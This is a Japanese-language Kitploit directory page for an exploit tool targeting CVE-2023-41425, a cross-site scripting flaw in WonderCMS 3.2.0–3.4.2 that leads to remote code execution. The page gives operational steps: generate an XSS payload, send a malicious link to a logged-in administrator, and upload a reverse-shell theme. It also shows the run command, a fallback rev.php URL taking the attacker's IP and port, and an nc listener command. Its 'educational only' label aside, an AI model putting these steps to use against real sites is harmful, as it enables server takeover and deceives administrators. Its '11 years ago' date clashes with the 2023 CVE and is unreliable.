Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2023-41425-WonderCMS-Authenticated-RCE — Xss インジェクション、WonderCMS 3.2.0 -3.4.2 | Kitploit
ツール/GitHubGitHub/diegomjx/cve-2023-41425-wondercms-authenticated-rce
フィッシングツールペイロード生成エクスプロイトウェブアプリケーション悪用ペネトレーションテスト学習と教育リモートアクセスツール
GitHubdiegomjx/cve-2023-41425-wondercms-authenticated-rce

CVE-2023-41425-WonderCMS-Authenticated-RCE

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

Xss インジェクション、WonderCMS 3.2.0 -3.4.2

リポジトリを見る
11年前未レビュー

CVE-2023-41425-WonderCMS-Authenticated-RCE

説明

WonderCMS v3.2.0 - v3.4.2 は脆弱です。リモート攻撃者は、クロスサイトスクリプティング(XSS)エクスプロイトを使用してサーバーを完全に制御できます(教育目的のみ)。以下がその計画です:

動作の仕組み

このエクスプロイトは、WonderCMSのinstallModuleコンポーネントを悪用して、任意のコードを実行するように細工されたスクリプトを忍び込ませます。

セットアップ

  • ツール: exploit.py
  • 必要なもの:
    • WonderCMSがインストールされているターゲットURL(管理者パスワードは不要)。
    • 攻撃者のマシンのIP。
    • リバースシェルリスナー用のポート。

実行手順

  1. スクリプトはxss.jsというファイルを生成します。このJavaScript兵器は、反射型XSSを悪用するように設計されています。
  2. 悪意のあるリンクを出力します。そのリンクを管理者に送信します。
  3. 管理者(ログインユーザー)があなたのリンクを開いたりクリックしたりすると、魔法が起こります:
  • バックグラウンドでリクエストがユーザーの同意なく発行されます。
  • テーマ/プラグインのアップロード機能を使用して、リバースシェルペイロードがアップロードされます。
  1. アップロードされると、ペイロードが実行され、ターゲットサーバーへのリバースシェル接続が取得されます。
root@kitploit:~
python3 exploit.py <URL> <YOUR_IP> <YOUR_PORT>

例

root@kitploit:~
python3 exploit.py http://sea.htb/loginURL 10.10.14.20 1234

フェイルセーフ:

リバースシェルが自動的にトリガーされない場合は、次のURLにアクセスしてください:

root@kitploit:~
http://<TARGET_URL>/themes/revshell-main/rev.php?lhost=<YOUR_IP>&lport=<YOUR_PORT>

注意:

以下のコマンドでリスナーを起動することを忘れないでください:

root@kitploit:~
nc -lvp 4444

クレジット

prodigiousMindが脆弱性を発見・報告しました https://gist.github.com/prodigiousMind/fc69a79629c4ba9ee88a7ad526043413

ツールをダウンロード